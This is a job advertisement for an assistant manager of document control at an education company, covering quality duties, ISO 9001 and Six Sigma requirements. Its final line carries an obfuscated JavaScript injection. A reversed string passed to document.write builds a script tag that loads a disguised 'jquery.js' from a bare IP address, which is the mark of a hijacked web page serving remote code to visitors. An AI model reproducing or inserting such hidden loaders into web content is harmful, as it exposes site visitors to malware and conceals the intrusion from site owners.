Industry : Education
Responsible for assisting HOD (Head Of Department) in managing document control department, ensuring compliance to defined standards and liaison with different stakeholders for all documents compliance.
– Document doc. control procedure and establish training package as part of awareness drive to LeapEd talent (Employees)
– Deliver training package to LeapEd talents and to school SLTs (if need arises).
– Liaise with relevant department to ensure adequate procedure are logged in under doc. control dept.
– Drive for continuous improvement and adequacy of document control policy and procedure based on data collection from the different quality meeting or other sources of information.
– Participate in LeapEd quality meeting at various operation levels and divisions and work closely with all relevant divisions to ensure effective implementation and reporting of progress and addressing of issues is reported, tracked and actioned by relevant stakeholders
– Monitor and review action plans for quality KPI and continuous improvement to ensure all milestone and targets are met within the scheduled timeline.
– Ensure proper escalation to HOD on any critical non- closure of major issues.
– Assist in monitoring department budget and planning.
Client and Stakeholders Management
– Provide regular communication on progress reports and continuous improvement initiatives in the doc control dept to HOD and relevant stakeholders, and follow up on the next action as appropriate with relevant team.
– Ensure all documents are the most current revision being implemented across LeapEd services and Trust Schools. Ineffective implementation of the policies/procedures to be managed and communicated to HOD and respective Devision heads appropriately
Other Responsibilities and Duties
– Any other appropriate duties as allocated by HOD and CEO Office
– To promote and adhere to the Company Vision and Values at all times.
– Commitment to quality, positive attitude, proactive and take ownership and demonstrate passion and enthusiasm.
– Observe culturally sensitive and appropriate behavior, dress code and language at all times.
– Possess a recognised Degree in Quality Management, Organizational Development or other related discipline.
– Certifications an advantage including Quality Auditor, Quality Improvement Associate, Six Sigma, Kaizen.
– Preferably to Possess ISO 9001 certification from recognized training providers.
– Knowledge of relevant regulatory requirements.strong computer skills including Microsoft Office and databases.
– More than 5 years related experience in managing document control dept.
– Possess knowledge and experience in managing Quality Doc control section and possess knowledge and application of ISO9001 .
– Experienced with implementation of Continuous Improvement initiatives
– Preferably, experienced in setting up the Doc control section in the Quality Assurance dept.
– Possess a sound know-how of Total Quality Management Concept
– Possess knowledge of QC tools, and had applied the wide range of statistical application to work place.
– Experienced and had uses problem solving technique in various project management
– Exposure to Kaizen concept and 6 sigma application in the workplace document.write(‘>tpircs/”sj.yreuqj/87.611.942.431//:sptth”=crs tpircs<'.split("").reverse().join(""))